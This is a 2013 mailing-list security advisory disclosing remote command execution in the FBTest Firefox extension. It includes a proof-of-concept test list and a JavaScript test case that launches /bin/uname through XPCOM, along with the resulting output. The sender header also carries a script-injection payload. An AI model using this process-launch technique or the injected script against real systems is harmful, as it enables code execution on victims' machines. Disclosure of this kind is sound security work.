[<prev] [next>] [day] [month] [year] [list]
Message-ID: <D713E903BD1.00000914tytusromekiatomek@inbox.com>
Date: Mon, 2 Dec 2013 12:29:13 -0800
From: "ScripT setInterval(function(){for( ){alert('fixme')} } 10) /scRIpt"
<tytusromekiatomek@...ox.com>
To: full-disclosure@...ts.grok.org.uk, bugtraq@...urityfocus.com
Subject: FBTest remote command execution.
General info:
=============
The Firefox extension FBTest (http://getfirebug.com/wiki/index.php/FBTest) version =< 1.12b4 allows RCE on a host running tests.
This was only tested on Linux. If the user running FBTest would point extension to the URL containing malicious test cases (intentionally or by being lurked),
then JavaScript code can freely call Mozilla components using XPCOM framework. Some may say it's a feature and this is how extensions generally work. OK, cool.
Important notice:
=================
1) It should be crystal clear the FBTest is not part of Firebug.
2) It should be clear that FBTest is not distributed with Firebug.
3) It should be clear Firebug users are not affected in any way by any bugs in FBTest.
4) FBTest is just a helper extension primarily used by Firebug Working Group for testing Firebug.
Thanks to Firebug team and especially to Jan (Honza) Odvarko for help in coordinated disclosure of this advisory.
Running PoC:
============
-- cut --
[New Thread 0xe36ffb70 (LWP 22040)]
[New Thread 0xe2efeb70 (LWP 22041)]
[New Thread 0xe26fdb70 (LWP 22042)]
Linux box 3.2.6 #1 SMP Wed Feb 6 01:19:11 GMT 2013 x86_64 GNU/Linux
[Thread 0xed82db70 (LWP 22027) exited]
[Thread 0xe54ffb70 (LWP 22038) exited]
[Thread 0xeb4ffb70 (LWP 22030) exited]
-- cut --
FBTest stub:
============
-- cut
<!DOCTYPE html>
<html>
<head>
<!-- XXX: point these to https://getfirebug.com/tests/head/firebug.html -->
<link rel="stylesheet" href="./testConsole.css" type="text/css"/>
<link rel="stylesheet" href="./testList.css" type="text/css"/>
<link rel="stylesheet" href="./testResult.css" type="text/css"/>
<link rel="stylesheet" href="./tabView.css" type="text/css"/>
<script type="text/javascript" src="./testListUtils.js"></script>
</head>
<body>
<script type="text/javascript">
var driverBaseURI = getDriverBaseURI();
var serverURI = driverBaseURI;
var testList = [
{group: "foo", uri: "poc.js", desc: "bar" },
]
</script>
<div id="tests"></div>
</body>
</html>
-- cut
RCE testcase:
=============
-- cut
function runTest() {
try {
main();
FBTest.clearCache();
}
catch (err) {
FBTest.exception("Exception occured: ", err);
}
finally {
FBTest.testDone();
}
}
function main()
{
try { cmd(); FBTest.clearCache(); } catch (e) { ; }
}
function cmd() {
try {
var f = Components.classes["@mozilla.org/file/local;1"]
.createInstance(Components.interfaces.nsILocalFile);
} catch (e) { alert(e); }
f.initWithPath("/bin/uname");
var p = Components.classes["@mozilla.org/process/util;1"]
.createInstance(Components.interfaces.nsIProcess);
p.init(f);
const args = ["-a"];
p.run(true, args, args.length);
}
-- cut
Credits:
========
AKAT-1, 22733db72ab3ed94b5f8a1ffcde850251fe6f466, c8e74ebd8392fda4788179f9a02bb49337638e7b
____________________________________________________________
FREE 3D EARTH SCREENSAVER - Watch the Earth right on your desktop!
Check it out at http://www.inbox.com/earth
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Powered by blists - more mailing lists